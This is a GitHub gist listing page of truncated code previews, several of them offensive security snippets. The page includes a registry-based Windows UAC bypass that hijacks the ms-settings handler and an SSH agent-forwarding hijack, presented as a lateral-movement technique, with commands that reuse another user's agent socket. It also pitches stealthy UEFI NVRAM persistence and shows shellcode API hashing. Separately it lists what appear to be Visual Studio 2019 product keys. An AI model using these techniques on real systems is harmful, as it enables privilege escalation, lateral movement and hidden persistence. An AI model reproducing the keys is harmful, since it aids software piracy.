Persist data in UEFI NVRAM variables.
- Stealthy way to store secrets and other data in UEFI.
- Will survive a reimaging of the operating system.
11philip22
/ WoW64_call.cpp
Created
July 20, 2021 06:51
— forked from Cr4sh/WoW64_call.cpp
WoW64 Heaven's Gate
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #define DB(_val_) __asm __emit (_val_) | |
| #define INVALID_SYSCALL (DWORD)(-1) | |
| // code selectors | |
| #define CS_32 0x23 | |
| #define CS_64 0x33 |
11philip22
/ gist:d4d2e68f2652032cd9e0e94f5636b909
Created
April 16, 2021 08:44
Visual Studio 2019 Product Key
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Visual Studio 2019 Enterprise | |
| BF8Y8-GN2QH-T84XB-QVY3B-RC4DF | |
| Visual Studio 2019 Professional | |
| NYWVH-HT4XC-R2WYW-9Y3CM-X4V3Y |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force | |
| New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force |
11philip22
/ _README.md
Created
March 18, 2021 09:03
— forked from jthuraisamy/_README.md
GospelRoom: Data Storage in UEFI NVRAM Variables
11philip22
/ hash.rb
Last active
February 25, 2021 18:32
Get function hash from dll ruby hash.rb kernel32.dll GetProcAddress https://haopingku.github.io/blog/2017/metasploit-windows-shellcode.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def ror i, bits = 13 | |
| ((i >> bits) | (i << (32 - bits))) & 0xFFFFFFFF | |
| end | |
| def hash mod, func | |
| mod_hash = "#{mod.upcase.b}\x00" | |
| .encode('utf-16le') | |
| .unpack('C*') | |
| .inject(0){|h, i| ror(h) + i} | |
| func_hash = "#{func.b}\x00" | |
| .unpack('C*') |
11philip22
/ SSH Agent Forwarding.md
Created
February 25, 2021 10:15
— forked from int0x80/SSH Agent Forwarding.md
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]
user@internal:~$ hostname -f
internal.company.tld
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Resources": { | |
| "EC2": { | |
| "Type": "AWS::EC2::Instance", | |
| "Metadata": { | |
| "AWS::CloudFormation::Init" : { | |
| "configSets" : { | |
| "full_install" : [ | |
| "setup_epel", | |
| "install_utils" |
11philip22
/ http_extended.py
Created
February 14, 2021 15:47
https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """Extend Python's built in HTTP server to save files | |
| curl or wget can be used to send files with options similar to the following | |
| curl -X PUT --upload-file somefile.txt http://localhost:8000 | |
| wget -O- --method=PUT --body-file=somefile.txt http://localhost:8000/somefile.txt | |
| __Note__: curl automatically appends the filename onto the end of the URL so |
11philip22
/ SimpleHTTPServerWithUpload.py
Created
February 14, 2021 15:31
— forked from UniIsland/SimpleHTTPServerWithUpload.py
Simple Python Http Server with Upload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """Simple HTTP Server With Upload. | |
| This module builds on BaseHTTPServer by implementing the standard GET | |
| and HEAD requests in a fairly straightforward manner. | |
| """ |
11philip22
/ rtd.py
Created
February 10, 2021 15:04
— forked from alexander-hanel/rtd.py
python recursive traversal disassembly using capstone and pefile
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import re | |
| import pefile | |
| import string | |
| import struct | |
| from capstool import CapsTool | |
| from capstone import * | |
| from capstone.x86 import * | |
| BCC = ["je", "jne", "js", "jns", "jp", "jnp", "jo", "jno", "jl", "jle", "jg", |